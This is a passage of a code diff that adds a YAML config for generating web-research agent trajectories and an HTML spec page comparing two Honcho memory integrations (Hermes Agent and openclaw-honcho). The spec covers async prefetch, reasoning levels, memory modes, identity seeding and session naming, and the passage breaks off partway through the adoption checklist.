per_trajectory: false
# Metrics file name (saved in output directory)
output_file: "compression_metrics.json"

View File

@@ -0,0 +1,46 @@
# datagen-config-examples/web_research.yaml
#
# Batch data generation config for WebResearchEnv.
# Generates tool-calling trajectories for multi-step web research tasks.
#
# Usage:
# python batch_runner.py \
# --config datagen-config-examples/web_research.yaml \
# --run_name web_research_v1
environment: web-research
# Toolsets available to the agent during data generation
toolsets:
- web
- file
# How many parallel workers to use
num_workers: 4
# Questions per batch
batch_size: 20
# Total trajectories to generate (comment out to run full dataset)
max_items: 500
# Model to use for generation (override with --model flag)
model: openrouter/nousresearch/hermes-3-llama-3.1-405b
# System prompt additions (ephemeral — not saved to trajectories)
ephemeral_system_prompt: |
You are a highly capable research agent. When asked a factual question,
always use web_search to find current, accurate information before answering.
Cite at least 2 sources. Be concise and accurate.
# Output directory
output_dir: data/web_research_v1
# Trajectory compression settings (for fitting into training token budgets)
compression:
enabled: true
target_max_tokens: 16000
# Eval settings
eval_every: 100 # Run eval every N trajectories
eval_size: 25 # Number of held-out questions per eval run

View File

@@ -0,0 +1,698 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>honcho-integration-spec</title>
<style>
:root {
--bg: #0b0e14;
--bg-surface: #11151c;
--bg-elevated: #181d27;
--bg-code: #0d1018;
--fg: #c9d1d9;
--fg-bright: #e6edf3;
--fg-muted: #6e7681;
--fg-subtle: #484f58;
--accent: #7eb8f6;
--accent-dim: #3d6ea5;
--accent-glow: rgba(126, 184, 246, 0.08);
--green: #7ee6a8;
--green-dim: #2ea04f;
--orange: #e6a855;
--red: #f47067;
--purple: #bc8cff;
--cyan: #56d4dd;
--border: #21262d;
--border-subtle: #161b22;
--radius: 6px;
--font-sans: 'New York', ui-serif, 'Iowan Old Style', 'Apple Garamond', Baskerville, 'Times New Roman', 'Noto Emoji', serif;
--font-mono: 'Departure Mono', 'Noto Emoji', monospace;
}
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
html { scroll-behavior: smooth; scroll-padding-top: 2rem; }
body {
font-family: var(--font-sans);
background: var(--bg);
color: var(--fg);
line-height: 1.7;
font-size: 15px;
-webkit-font-smoothing: antialiased;
}
.container { max-width: 860px; margin: 0 auto; padding: 3rem 2rem 6rem; }
.hero {
text-align: center;
padding: 4rem 0 3rem;
border-bottom: 1px solid var(--border);
margin-bottom: 3rem;
}
.hero h1 { font-family: var(--font-mono); font-size: 2.2rem; font-weight: 700; color: var(--fg-bright); letter-spacing: -0.03em; margin-bottom: 0.5rem; }
.hero h1 span { color: var(--accent); }
.hero .subtitle { font-family: var(--font-sans); color: var(--fg-muted); font-size: 0.92rem; max-width: 560px; margin: 0 auto; line-height: 1.6; }
.hero .meta { margin-top: 1.5rem; display: flex; justify-content: center; gap: 1.5rem; flex-wrap: wrap; }
.hero .meta span { font-size: 0.8rem; color: var(--fg-subtle); font-family: var(--font-mono); }
.toc { background: var(--bg-surface); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.5rem 2rem; margin-bottom: 3rem; }
.toc h2 { font-size: 0.75rem; text-transform: uppercase; letter-spacing: 0.1em; color: var(--fg-muted); margin-bottom: 1rem; }
.toc ol { list-style: none; counter-reset: toc; columns: 2; column-gap: 2rem; }
.toc li { counter-increment: toc; break-inside: avoid; margin-bottom: 0.35rem; }
.toc li::before { content: counter(toc, decimal-leading-zero) " "; color: var(--fg-subtle); font-family: var(--font-mono); font-size: 0.75rem; margin-right: 0.25rem; }
.toc a { font-family: var(--font-mono); color: var(--fg); text-decoration: none; font-size: 0.82rem; transition: color 0.15s; }
.toc a:hover { color: var(--accent); }
section { margin-bottom: 4rem; }
section + section { padding-top: 1rem; }
h2 { font-family: var(--font-mono); font-size: 1.3rem; font-weight: 700; color: var(--fg-bright); letter-spacing: -0.01em; margin-bottom: 1.25rem; padding-bottom: 0.5rem; border-bottom: 1px solid var(--border); }
h3 { font-family: var(--font-mono); font-size: 1rem; font-weight: 600; color: var(--fg-bright); margin-top: 2rem; margin-bottom: 0.75rem; }
h4 { font-family: var(--font-mono); font-size: 0.9rem; font-weight: 600; color: var(--accent); margin-top: 1.5rem; margin-bottom: 0.5rem; }
p { margin-bottom: 1rem; font-size: 0.95rem; line-height: 1.75; }
strong { color: var(--fg-bright); font-weight: 600; }
a { color: var(--accent); text-decoration: none; }
a:hover { text-decoration: underline; }
ul, ol { margin-bottom: 1rem; padding-left: 1.5rem; font-size: 0.93rem; line-height: 1.7; }
li { margin-bottom: 0.35rem; }
li::marker { color: var(--fg-subtle); }
.table-wrap { overflow-x: auto; margin-bottom: 1.5rem; }
table { width: 100%; border-collapse: collapse; font-size: 0.88rem; }
th, td { text-align: left; padding: 0.6rem 1rem; border-bottom: 1px solid var(--border-subtle); }
th { font-family: var(--font-mono); font-size: 0.72rem; text-transform: uppercase; letter-spacing: 0.06em; color: var(--fg-muted); background: var(--bg-surface); border-bottom-color: var(--border); white-space: nowrap; }
td { font-family: var(--font-sans); font-size: 0.88rem; color: var(--fg); }
tr:hover td { background: var(--accent-glow); }
td code { background: var(--bg-elevated); padding: 0.15em 0.4em; border-radius: 3px; font-family: var(--font-mono); font-size: 0.82em; color: var(--cyan); }
pre { background: var(--bg-code); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.25rem 1.5rem; overflow-x: auto; margin-bottom: 1.5rem; font-family: var(--font-mono); font-size: 0.82rem; line-height: 1.65; color: var(--fg); }
pre code { background: none; padding: 0; color: inherit; font-size: inherit; }
code { font-family: var(--font-mono); font-size: 0.85em; }
p code, li code { background: var(--bg-elevated); padding: 0.15em 0.4em; border-radius: 3px; color: var(--cyan); font-size: 0.85em; }
.kw { color: var(--purple); }
.str { color: var(--green); }
.cm { color: var(--fg-subtle); font-style: italic; }
.num { color: var(--orange); }
.key { color: var(--accent); }
.mermaid { margin: 1.5rem 0 2rem; text-align: center; }
.mermaid svg { max-width: 100%; height: auto; }
.callout { font-family: var(--font-sans); background: var(--bg-surface); border-left: 3px solid var(--accent-dim); border-radius: 0 var(--radius) var(--radius) 0; padding: 1rem 1.25rem; margin-bottom: 1.5rem; font-size: 0.88rem; color: var(--fg-muted); line-height: 1.6; }
.callout strong { font-family: var(--font-mono); color: var(--fg-bright); }
.callout.success { border-left-color: var(--green-dim); }
.callout.warn { border-left-color: var(--orange); }
.badge { display: inline-block; font-family: var(--font-mono); font-size: 0.65rem; font-weight: 600; text-transform: uppercase; letter-spacing: 0.05em; padding: 0.2em 0.6em; border-radius: 3px; vertical-align: middle; margin-left: 0.4rem; }
.badge-done { background: var(--green-dim); color: #fff; }
.badge-wip { background: var(--orange); color: #0b0e14; }
.badge-todo { background: var(--fg-subtle); color: var(--fg); }
.checklist { list-style: none; padding-left: 0; }
.checklist li { padding-left: 1.5rem; position: relative; margin-bottom: 0.5rem; }
.checklist li::before { position: absolute; left: 0; font-family: var(--font-mono); font-size: 0.85rem; }
.checklist li.done { color: var(--fg-muted); }
.checklist li.done::before { content: "\2713"; color: var(--green); }
.checklist li.todo::before { content: "\25CB"; color: var(--fg-subtle); }
.checklist li.wip::before { content: "\25D4"; color: var(--orange); }
.compare { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; margin-bottom: 2rem; }
.compare-card { background: var(--bg-surface); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.25rem; }
.compare-card h4 { margin-top: 0; font-size: 0.82rem; }
.compare-card.after { border-color: var(--accent-dim); }
.compare-card ul { font-family: var(--font-mono); padding-left: 1.25rem; font-size: 0.8rem; }
hr { border: none; border-top: 1px solid var(--border); margin: 3rem 0; }
.progress-bar { position: fixed; top: 0; left: 0; height: 2px; background: var(--accent); z-index: 999; transition: width 0.1s linear; }
@media (max-width: 640px) {
.container { padding: 2rem 1rem 4rem; }
.hero h1 { font-size: 1.6rem; }
.toc ol { columns: 1; }
.compare { grid-template-columns: 1fr; }
table { font-size: 0.8rem; }
th, td { padding: 0.4rem 0.6rem; }
}
</style>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link href="https://fonts.googleapis.com/css2?family=Noto+Emoji&display=swap" rel="stylesheet">
<style>
@font-face {
font-family: 'Departure Mono';
src: url('https://cdn.jsdelivr.net/gh/rektdeckard/departure-mono@latest/fonts/DepartureMono-Regular.woff2') format('woff2');
font-weight: normal;
font-style: normal;
font-display: swap;
}
</style>
</head>
<body>
<div class="progress-bar" id="progress"></div>
<div class="container">
<header class="hero">
<h1>honcho<span>-integration-spec</span></h1>
<p class="subtitle">Comparison of Hermes Agent vs. openclaw-honcho — and a porting spec for bringing Hermes patterns into other Honcho integrations.</p>
<div class="meta">
<span>hermes-agent / openclaw-honcho</span>
<span>Python + TypeScript</span>
<span>2026-03-09</span>
</div>
</header>
<nav class="toc">
<h2>Contents</h2>
<ol>
<li><a href="#overview">Overview</a></li>
<li><a href="#architecture">Architecture comparison</a></li>
<li><a href="#diff-table">Diff table</a></li>
<li><a href="#patterns">Hermes patterns to port</a></li>
<li><a href="#spec-async">Spec: async prefetch</a></li>
<li><a href="#spec-reasoning">Spec: dynamic reasoning level</a></li>
<li><a href="#spec-modes">Spec: per-peer memory modes</a></li>
<li><a href="#spec-identity">Spec: AI peer identity formation</a></li>
<li><a href="#spec-sessions">Spec: session naming strategies</a></li>
<li><a href="#spec-cli">Spec: CLI surface injection</a></li>
<li><a href="#openclaw-checklist">openclaw-honcho checklist</a></li>
<li><a href="#nanobot-checklist">nanobot-honcho checklist</a></li>
</ol>
</nav>
<!-- OVERVIEW -->
<section id="overview">
<h2>Overview</h2>
<p>Two independent Honcho integrations have been built for two different agent runtimes: <strong>Hermes Agent</strong> (Python, baked into the runner) and <strong>openclaw-honcho</strong> (TypeScript plugin via hook/tool API). Both use the same Honcho peer paradigm — dual peer model, <code>session.context()</code>, <code>peer.chat()</code> — but they made different tradeoffs at every layer.</p>
<p>This document maps those tradeoffs and defines a porting spec: a set of Hermes-originated patterns, each stated as an integration-agnostic interface, that any Honcho integration can adopt regardless of runtime or language.</p>
<div class="callout">
<strong>Scope</strong> Both integrations work correctly today. This spec is about the delta — patterns in Hermes that are worth propagating and patterns in openclaw-honcho that Hermes should eventually adopt. The spec is additive, not prescriptive.
</div>
</section>
<!-- ARCHITECTURE -->
<section id="architecture">
<h2>Architecture comparison</h2>
<h3>Hermes: baked-in runner</h3>
<p>Honcho is initialised directly inside <code>AIAgent.__init__</code>. There is no plugin boundary. Session management, context injection, async prefetch, and CLI surface are all first-class concerns of the runner. Context is injected once per session (baked into <code>_cached_system_prompt</code>) and never re-fetched mid-session — this maximises prefix cache hits at the LLM provider.</p>
<div class="mermaid">
%%{init: {'theme': 'dark', 'themeVariables': { 'primaryColor': '#1f3150', 'primaryTextColor': '#c9d1d9', 'primaryBorderColor': '#3d6ea5', 'lineColor': '#3d6ea5', 'secondaryColor': '#162030', 'tertiaryColor': '#11151c' }}}%%
flowchart TD
U["user message"] --> P["_honcho_prefetch()<br/>(reads cache — no HTTP)"]
P --> SP["_build_system_prompt()<br/>(first turn only, cached)"]
SP --> LLM["LLM call"]
LLM --> R["response"]
R --> FP["_honcho_fire_prefetch()<br/>(daemon threads, turn end)"]
FP --> C1["prefetch_context() thread"]
FP --> C2["prefetch_dialectic() thread"]
C1 --> CACHE["_context_cache / _dialectic_cache"]
C2 --> CACHE
style U fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style P fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style SP fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style LLM fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style R fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style FP fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style C1 fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style C2 fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style CACHE fill:#11151c,stroke:#484f58,color:#6e7681
</div>
<h3>openclaw-honcho: hook-based plugin</h3>
<p>The plugin registers hooks against OpenClaw's event bus. Context is fetched synchronously inside <code>before_prompt_build</code> on every turn. Message capture happens in <code>agent_end</code>. The multi-agent hierarchy is tracked via <code>subagent_spawned</code>. This model is correct but every turn pays a blocking Honcho round-trip before the LLM call can begin.</p>
<div class="mermaid">
%%{init: {'theme': 'dark', 'themeVariables': { 'primaryColor': '#1f3150', 'primaryTextColor': '#c9d1d9', 'primaryBorderColor': '#3d6ea5', 'lineColor': '#3d6ea5', 'secondaryColor': '#162030', 'tertiaryColor': '#11151c' }}}%%
flowchart TD
U2["user message"] --> BPB["before_prompt_build<br/>(BLOCKING HTTP — every turn)"]
BPB --> CTX["session.context()"]
CTX --> SP2["system prompt assembled"]
SP2 --> LLM2["LLM call"]
LLM2 --> R2["response"]
R2 --> AE["agent_end hook"]
AE --> SAVE["session.addMessages()<br/>session.setMetadata()"]
style U2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style BPB fill:#3a1515,stroke:#f47067,color:#c9d1d9
style CTX fill:#3a1515,stroke:#f47067,color:#c9d1d9
style SP2 fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style LLM2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style R2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style AE fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style SAVE fill:#11151c,stroke:#484f58,color:#6e7681
</div>
</section>
<!-- DIFF TABLE -->
<section id="diff-table">
<h2>Diff table</h2>
<div class="table-wrap">
<table>
<thead>
<tr>
<th>Dimension</th>
<th>Hermes Agent</th>
<th>openclaw-honcho</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Context injection timing</strong></td>
<td>Once per session (cached). Zero HTTP on response path after turn 1.</td>
<td>Every turn, blocking. Fresh context per turn but adds latency.</td>
</tr>
<tr>
<td><strong>Prefetch strategy</strong></td>
<td>Daemon threads fire at turn end; consumed next turn from cache.</td>
<td>None. Blocking call at prompt-build time.</td>
</tr>
<tr>
<td><strong>Dialectic (peer.chat)</strong></td>
<td>Prefetched async; result injected into system prompt next turn.</td>
<td>On-demand via <code>honcho_recall</code> / <code>honcho_analyze</code> tools.</td>
</tr>
<tr>
<td><strong>Reasoning level</strong></td>
<td>Dynamic: scales with message length. Floor = config default. Cap = "high".</td>
<td>Fixed per tool: recall=minimal, analyze=medium.</td>
</tr>
<tr>
<td><strong>Memory modes</strong></td>
<td><code>user_memory_mode</code> / <code>agent_memory_mode</code>: hybrid / honcho / local.</td>
<td>None. Always writes to Honcho.</td>
</tr>
<tr>
<td><strong>Write frequency</strong></td>
<td>async (background queue), turn, session, N turns.</td>
<td>After every agent_end (no control).</td>
</tr>
<tr>
<td><strong>AI peer identity</strong></td>
<td><code>observe_me=True</code>, <code>seed_ai_identity()</code>, <code>get_ai_representation()</code>, SOUL.md → AI peer.</td>
<td>Agent files uploaded to agent peer at setup. No ongoing self-observation seeding.</td>
</tr>
<tr>
<td><strong>Context scope</strong></td>
<td>User peer + AI peer representation, both injected.</td>
<td>User peer (owner) representation + conversation summary. <code>peerPerspective</code> on context call.</td>
</tr>
<tr>
<td><strong>Session naming</strong></td>
<td>per-directory / global / manual map / title-based.</td>
<td>Derived from platform session key.</td>
</tr>
<tr>
<td><strong>Multi-agent</strong></td>
<td>Single-agent only.</td>
<td>Parent observer hierarchy via <code>subagent_spawned</code>.</td>
</tr>
<tr>
<td><strong>Tool surface</strong></td>
<td>Single <code>query_user_context</code> tool (on-demand dialectic).</td>
<td>6 tools: session, profile, search, context (fast) + recall, analyze (LLM).</td>
</tr>
<tr>
<td><strong>Platform metadata</strong></td>
<td>Not stripped.</td>
<td>Explicitly stripped before Honcho storage.</td>
</tr>
<tr>
<td><strong>Message dedup</strong></td>
<td>None (sends on every save cycle).</td>
<td><code>lastSavedIndex</code> in session metadata prevents re-sending.</td>
</tr>
<tr>
<td><strong>CLI surface in prompt</strong></td>
<td>Management commands injected into system prompt. Agent knows its own CLI.</td>
<td>Not injected.</td>
</tr>
<tr>
<td><strong>AI peer name in identity</strong></td>
<td>Replaces "Hermes Agent" in DEFAULT_AGENT_IDENTITY when configured.</td>
<td>Not implemented.</td>
</tr>
<tr>
<td><strong>QMD / local file search</strong></td>
<td>Not implemented.</td>
<td>Passthrough tools when QMD backend configured.</td>
</tr>
<tr>
<td><strong>Workspace metadata</strong></td>
<td>Not implemented.</td>
<td><code>agentPeerMap</code> in workspace metadata tracks agent&#8594;peer ID.</td>
</tr>
</tbody>
</table>
</div>
</section>
<!-- PATTERNS -->
<section id="patterns">
<h2>Hermes patterns to port</h2>
<p>Six patterns from Hermes are worth adopting in any Honcho integration. They are described below as integration-agnostic interfaces — the implementation will differ per runtime, but the contract is the same.</p>
<div class="compare">
<div class="compare-card">
<h4>Patterns Hermes contributes</h4>
<ul>
<li>Async prefetch (zero-latency)</li>
<li>Dynamic reasoning level</li>
<li>Per-peer memory modes</li>
<li>AI peer identity formation</li>
<li>Session naming strategies</li>
<li>CLI surface injection</li>
</ul>
</div>
<div class="compare-card after">
<h4>Patterns openclaw contributes back</h4>
<ul>
<li>lastSavedIndex dedup</li>
<li>Platform metadata stripping</li>
<li>Multi-agent observer hierarchy</li>
<li>peerPerspective on context()</li>
<li>Tiered tool surface (fast/LLM)</li>
<li>Workspace agentPeerMap</li>
</ul>
</div>
</div>
</section>
<!-- SPEC: ASYNC PREFETCH -->
<section id="spec-async">
<h2>Spec: async prefetch</h2>
<h3>Problem</h3>
<p>Calling <code>session.context()</code> and <code>peer.chat()</code> synchronously before each LLM call adds 200800ms of Honcho round-trip latency to every turn. Users experience this as the agent "thinking slowly."</p>
<h3>Pattern</h3>
<p>Fire both calls as non-blocking background work at the <strong>end</strong> of each turn. Store results in a per-session cache keyed by session ID. At the <strong>start</strong> of the next turn, pop from cache — the HTTP is already done. First turn is cold (empty cache); all subsequent turns are zero-latency on the response path.</p>
<h3>Interface contract</h3>
<pre><code><span class="cm">// TypeScript (openclaw / nanobot plugin shape)</span>
<span class="kw">interface</span> <span class="key">AsyncPrefetch</span> {
<span class="cm">// Fire context + dialectic fetches at turn end. Non-blocking.</span>
firePrefetch(sessionId: <span class="str">string</span>, userMessage: <span class="str">string</span>): <span class="kw">void</span>;
<span class="cm">// Pop cached results at turn start. Returns empty if cache is cold.</span>
popContextResult(sessionId: <span class="str">string</span>): ContextResult | <span class="kw">null</span>;
popDialecticResult(sessionId: <span class="str">string</span>): <span class="str">string</span> | <span class="kw">null</span>;
}
<span class="kw">type</span> <span class="key">ContextResult</span> = {
representation: <span class="str">string</span>;
card: <span class="str">string</span>[];
aiRepresentation?: <span class="str">string</span>; <span class="cm">// AI peer context if enabled</span>
summary?: <span class="str">string</span>; <span class="cm">// conversation summary if fetched</span>
};</code></pre>
<h3>Implementation notes</h3>
<ul>
<li>Python: <code>threading.Thread(daemon=True)</code>. Write to <code>dict[session_id, result]</code> — GIL makes this safe for simple writes.</li>
<li>TypeScript: <code>Promise</code> stored in <code>Map&lt;string, Promise&lt;ContextResult&gt;&gt;</code>. Await at pop time. If not resolved yet, skip (return null) — do not block.</li>
<li>The pop is destructive: clears the cache entry after reading so stale data never accumulates.</li>
<li>Prefetch should also fire on first turn (even though it won't be consumed until turn 2) — this ensures turn 2 is never cold.</li>
</ul>
<h3>openclaw-honcho adoption</h3>
<p>Move <code>session.context()</code> from <code>before_prompt_build</code> to a post-<code>agent_end</code> background task. Store result in <code>state.contextCache</code>. In <code>before_prompt_build</code>, read from cache instead of calling Honcho. If cache is empty (turn 1), inject nothing — the prompt is still valid without Honcho context on the first turn.</p>
</section>
<!-- SPEC: DYNAMIC REASONING LEVEL -->
<section id="spec-reasoning">
<h2>Spec: dynamic reasoning level</h2>
<h3>Problem</h3>
<p>Honcho's dialectic endpoint supports reasoning levels from <code>minimal</code> to <code>max</code>. A fixed level per tool wastes budget on simple queries and under-serves complex ones.</p>
<h3>Pattern</h3>
<p>Select the reasoning level dynamically based on the user's message. Use the configured default as a floor. Bump by message length. Cap auto-selection at <code>high</code> — never select <code>max</code> automatically.</p>
<h3>Interface contract</h3>
<pre><code><span class="cm">// Shared helper — identical logic in any language</span>
<span class="kw">const</span> LEVELS = [<span class="str">"minimal"</span>, <span class="str">"low"</span>, <span class="str">"medium"</span>, <span class="str">"high"</span>, <span class="str">"max"</span>];
<span class="kw">function</span> <span class="key">dynamicReasoningLevel</span>(
query: <span class="str">string</span>,
configDefault: <span class="str">string</span> = <span class="str">"low"</span>
): <span class="str">string</span> {
<span class="kw">const</span> baseIdx = Math.max(<span class="num">0</span>, LEVELS.indexOf(configDefault));
<span class="kw">const</span> n = query.length;
<span class="kw">const</span> bump = n &lt; <span class="num">120</span> ? <span class="num">0</span> : n &lt; <span class="num">400</span> ? <span class="num">1</span> : <span class="num">2</span>;
<span class="kw">return</span> LEVELS[Math.min(baseIdx + bump, <span class="num">3</span>)]; <span class="cm">// cap at "high" (idx 3)</span>
}</code></pre>
<h3>Config key</h3>
<p>Add a <code>dialecticReasoningLevel</code> config field (string, default <code>"low"</code>). This sets the floor. Users can raise or lower it. The dynamic bump always applies on top.</p>
<h3>openclaw-honcho adoption</h3>
<p>Apply in <code>honcho_recall</code> and <code>honcho_analyze</code>: replace the fixed <code>reasoningLevel</code> with the dynamic selector. <code>honcho_recall</code> should use floor <code>"minimal"</code> and <code>honcho_analyze</code> floor <code>"medium"</code> — both still bump with message length.</p>
</section>
<!-- SPEC: PER-PEER MEMORY MODES -->
<section id="spec-modes">
<h2>Spec: per-peer memory modes</h2>
<h3>Problem</h3>
<p>Users want independent control over whether user context and agent context are written locally, to Honcho, or both. A single <code>memoryMode</code> shorthand is not granular enough.</p>
<h3>Pattern</h3>
<p>Three modes per peer: <code>hybrid</code> (write both local + Honcho), <code>honcho</code> (Honcho only, disable local files), <code>local</code> (local files only, skip Honcho sync for this peer). Two orthogonal axes: user peer and agent peer.</p>
<h3>Config schema</h3>
<pre><code><span class="cm">// ~/.openclaw/openclaw.json (or ~/.nanobot/config.json)</span>
{
<span class="str">"plugins"</span>: {
<span class="str">"openclaw-honcho"</span>: {
<span class="str">"config"</span>: {
<span class="str">"apiKey"</span>: <span class="str">"..."</span>,
<span class="str">"memoryMode"</span>: <span class="str">"hybrid"</span>, <span class="cm">// shorthand: both peers</span>
<span class="str">"userMemoryMode"</span>: <span class="str">"honcho"</span>, <span class="cm">// override for user peer</span>
<span class="str">"agentMemoryMode"</span>: <span class="str">"hybrid"</span> <span class="cm">// override for agent peer</span>
}
}
}
}</code></pre>
<h3>Resolution order</h3>
<ol>
<li>Per-peer field (<code>userMemoryMode</code> / <code>agentMemoryMode</code>) — wins if present.</li>
<li>Shorthand <code>memoryMode</code> — applies to both peers as default.</li>
<li>Hardcoded default: <code>"hybrid"</code>.</li>
</ol>
<h3>Effect on Honcho sync</h3>
<ul>
<li><code>userMemoryMode=local</code>: skip adding user peer messages to Honcho.</li>
<li><code>agentMemoryMode=local</code>: skip adding assistant peer messages to Honcho.</li>
<li>Both local: skip <code>session.addMessages()</code> entirely.</li>
<li><code>userMemoryMode=honcho</code>: disable local USER.md writes.</li>
<li><code>agentMemoryMode=honcho</code>: disable local MEMORY.md / SOUL.md writes.</li>
</ul>
</section>
<!-- SPEC: AI PEER IDENTITY -->
<section id="spec-identity">
<h2>Spec: AI peer identity formation</h2>
<h3>Problem</h3>
<p>Honcho builds the user's representation organically by observing what the user says. The same mechanism exists for the AI peer — but only if <code>observe_me=True</code> is set for the agent peer. Without it, the agent peer accumulates nothing and Honcho's AI-side model never forms.</p>
<p>Additionally, existing persona files (SOUL.md, IDENTITY.md) should seed the AI peer's Honcho representation at first activation, rather than waiting for it to emerge from scratch.</p>
<h3>Part A: observe_me=True for agent peer</h3>
<pre><code><span class="cm">// TypeScript — in session.addPeers() call</span>
<span class="kw">await</span> session.addPeers([
[ownerPeer.id, { observeMe: <span class="kw">true</span>, observeOthers: <span class="kw">false</span> }],
[agentPeer.id, { observeMe: <span class="kw">true</span>, observeOthers: <span class="kw">true</span> }], <span class="cm">// was false</span>
]);</code></pre>
<p>This is a one-line change but foundational. Without it, Honcho's AI peer representation stays empty regardless of what the agent says.</p>
<h3>Part B: seedAiIdentity()</h3>
<pre><code><span class="kw">async function</span> <span class="key">seedAiIdentity</span>(
session: HonchoSession,
agentPeer: Peer,
content: <span class="str">string</span>,
source: <span class="str">string</span>
): Promise&lt;<span class="kw">boolean</span>&gt; {
<span class="kw">const</span> wrapped = [
<span class="str">`&lt;ai_identity_seed&gt;`</span>,
<span class="str">`&lt;source&gt;${source}&lt;/source&gt;`</span>,
<span class="str">``</span>,
content.trim(),
<span class="str">`&lt;/ai_identity_seed&gt;`</span>,
].join(<span class="str">"\n"</span>);
<span class="kw">await</span> agentPeer.addMessage(<span class="str">"assistant"</span>, wrapped);
<span class="kw">return true</span>;
}</code></pre>
<h3>Part C: migrate agent files at setup</h3>
<p>During <code>openclaw honcho setup</code>, upload agent-self files (SOUL.md, IDENTITY.md, AGENTS.md, BOOTSTRAP.md) to the agent peer using <code>seedAiIdentity()</code> instead of <code>session.uploadFile()</code>. This routes the content through Honcho's observation pipeline rather than the file store.</p>
<h3>Part D: AI peer name in identity</h3>
<p>When the agent has a configured name (non-default), inject it into the agent's self-identity prefix. In OpenClaw this means adding to the injected system prompt section:</p>
<pre><code><span class="cm">// In context hook return value</span>
<span class="kw">return</span> {
systemPrompt: [
agentName ? <span class="str">`You are ${agentName}.`</span> : <span class="str">""</span>,
<span class="str">"## User Memory Context"</span>,
...sections,
].filter(Boolean).join(<span class="str">"\n\n"</span>)
};</code></pre>
<h3>CLI surface: honcho identity subcommand</h3>
<pre><code>openclaw honcho identity &lt;file&gt; <span class="cm"># seed from file</span>
openclaw honcho identity --show <span class="cm"># show current AI peer representation</span></code></pre>
</section>
<!-- SPEC: SESSION NAMING -->
<section id="spec-sessions">
<h2>Spec: session naming strategies</h2>
<h3>Problem</h3>
<p>When Honcho is used across multiple projects or directories, a single global session means every project shares the same context. Per-directory sessions provide isolation without requiring users to name sessions manually.</p>
<h3>Strategies</h3>
<div class="table-wrap">
<table>
<thead><tr><th>Strategy</th><th>Session key</th><th>When to use</th></tr></thead>
<tbody>
<tr><td><code>per-directory</code></td><td>basename of CWD</td><td>Default. Each project gets its own session.</td></tr>
<tr><td><code>global</code></td><td>fixed string <code>"global"</code></td><td>Single cross-project session.</td></tr>
<tr><td>manual map</td><td>user-configured per path</td><td><code>sessions</code> config map overrides directory basename.</td></tr>
<tr><td>title-based</td><td>sanitized session title</td><td>When agent supports named sessions; title set mid-conversation.</td></tr>
</tbody>
</table>
</div>
<h3>Config schema</h3>
<pre><code>{
<span class="str">"sessionStrategy"</span>: <span class="str">"per-directory"</span>, <span class="cm">// "per-directory" | "global"</span>
<span class="str">"sessionPeerPrefix"</span>: <span class="kw">false</span>, <span class="cm">// prepend peer name to session key</span>
<span class="str">"sessions"</span>: { <span class="cm">// manual overrides</span>
<span class="str">"/home/user/projects/foo"</span>: <span class="str">"foo-project"</span>
}
}</code></pre>
<h3>CLI surface</h3>
<pre><code>openclaw honcho sessions <span class="cm"># list all mappings</span>
openclaw honcho map &lt;name&gt; <span class="cm"># map cwd to session name</span>
openclaw honcho map <span class="cm"># no-arg = list mappings</span></code></pre>
<p>Resolution order: manual map wins &rarr; session title &rarr; directory basename &rarr; platform key.</p>
</section>
<!-- SPEC: CLI SURFACE INJECTION -->
<section id="spec-cli">
<h2>Spec: CLI surface injection</h2>
<h3>Problem</h3>
<p>When a user asks "how do I change my memory settings?" or "what Honcho commands are available?" the agent either hallucinates or says it doesn't know. The agent should know its own management interface.</p>
<h3>Pattern</h3>
<p>When Honcho is active, append a compact command reference to the system prompt. The agent can cite these commands directly instead of guessing.</p>
<pre><code><span class="cm">// In context hook, append to systemPrompt</span>
<span class="kw">const</span> honchoSection = [
<span class="str">"# Honcho memory integration"</span>,
<span class="str">`Active. Session: ${sessionKey}. Mode: ${mode}.`</span>,
<span class="str">"Management commands:"</span>,
<span class="str">" openclaw honcho status — show config + connection"</span>,
<span class="str">" openclaw honcho mode [hybrid|honcho|local] — show or set memory mode"</span>,
<span class="str">" openclaw honcho sessions — list session mappings"</span>,
<span class="str">" openclaw honcho map &lt;name&gt; — map directory to session"</span>,
<span class="str">" openclaw honcho identity [file] [--show] — seed or show AI identity"</span>,
<span class="str">" openclaw honcho setup — full interactive wizard"</span>,
].join(<span class="str">"\n"</span>);</code></pre>
<div class="callout warn">
<strong>Keep it compact.</strong> This section is injected every turn. Keep it under 300 chars of context. List commands, not explanations — the agent can explain them on request.
</div>
</section>
<!-- OPENCLAW CHECKLIST -->
<section id="openclaw-checklist">
<h2>openclaw-honcho checklist</h2>
<p>Ordered by impact. Each item maps to a spec section above.</p>
<ul class="checklist">
<li class="todo"><strong>Async prefetch</strong> — move <code>session.context()</code> out of <code>before_prompt_build</code> into post-<code>agent_end</code> background Promise. Pop from cache at prompt build. (<a href="#spec-async">spec</a>)</li>
<li class="todo"><strong>observe_me=True for agent peer</strong> — one-line change in <code>session.addPeers()</code> config for agent peer. (<a href="#spec-identity">spec</a>)</li>
<li class="todo"><strong>Dynamic reasoning level</strong> — add <code>dynamicReasoningLevel()</code> helper; apply in <code>honcho_recall</code> and <code>honcho_analyze</code>. Add <code>dialecticReasoningLevel</code> to config schema. (<a href="#spec-reasoning">spec</a>)</li>
<li class="todo"><strong>Per-peer memory modes</strong> — add <code>userMemoryMode</code> / <code>agentMemoryMode</code> to config; gate Honcho sync and local writes accordingly. (<a href="#spec-modes">spec</a>)</li>
